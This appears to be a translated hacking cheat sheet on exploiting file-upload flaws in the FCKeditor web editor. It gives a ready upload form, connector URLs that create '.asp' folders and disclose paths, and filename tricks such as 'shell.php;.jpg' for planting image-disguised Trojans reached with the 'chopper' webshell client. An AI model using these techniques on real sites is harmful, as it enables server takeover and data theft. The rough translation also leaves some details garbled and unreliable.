fck editor
View version:
FCKeditor/_whatsnew.html
/fckeditor/editor/dialong/fck_about.html
Version 2.2: Add one after uploading files under apache + linux environment.
<=2.4.2 for php
In the place where the php upload is processed, the upload type of the Media type is not controlled, causing the user to upload any file, save the following as an html file, and modify the action address:
<form id="frmUpload" enctype="multipart/form-data" action="" Type="Media" Method="post">
Upload a new file:<br>
<input type="file" name="uploadfile" size="100"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
You can also find some upload addresses under this version on the Internet, try to upload the x.asp folder one by one, create a picture Trojan under the folder, the upload is successful, check the web page source code to find the picture url, access, chopper connection.
Fckeditor file upload "." becomes "_" underline bypass method:
In many cases, the uploaded files such as: shell.php.rar or shell.php; .jpg will become shell_php; .jpg, you can submit shell.php + space to bypass, spaces only support win system.
Secondary upload: Continue to upload files with the same name will become shell.php; (1) .jpg.
You can also create a directory, and uploading files in this directory can be bypassed.
Break through the creation of the folder FCKeditor_2.5 / editor / filemanager / connectors / asp / connector.asp? Command = CreateFolder & Type = Image & CurrentFolder = / xx.asp & NewFolderName = x.asp
At this time, the second-level directory is created recursively, and Trojan files can be bypassed by uploading Trojan files in this directory.
Copy the complete address, view the webpage source code, find the breakthrough url, access the breakthrough, chopper connection.
You can also capture packets when uploading, and modify the c.asp folder we uploaded to cc.asp, so that you can bypass c.asp and upload a Trojan horse in cc.asp.
Raw under the agent modifies% 2F to cc.asp.
Explosion path vulnerability:
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
FCKeditor's passive filtering strategy caused by the lack of filtering problems:
Impact version: <= 2.4.3
2.4.3 File category defaults to refuse to upload type:
html\htm\php\php2\php3\php4\php5\phtml\inc\asp\aspx\ascx\jsp\cfm\cfc\pl\bat\exe\com\all\vbs\js\reg\cgi\htaccess\asis\sh\shtml\shtml\phtm
Fckeditor 2.0 <= 2.2 allows uploading asa \ cer \ php2 \ php4 \ inc \ pwml \ pht suffix files. The files saved after uploading use $ sFilePath = $ sServerDir. $ SFileName instead of using $ sExtension as the suffix. Direct result Add a. After uploading a file under win to break through.
Under Apache, the Apache file name resolution flaw vulnerability can also be exploited. It is recommended to use the File type when defining the TYPE variable in the upload vulnerability.
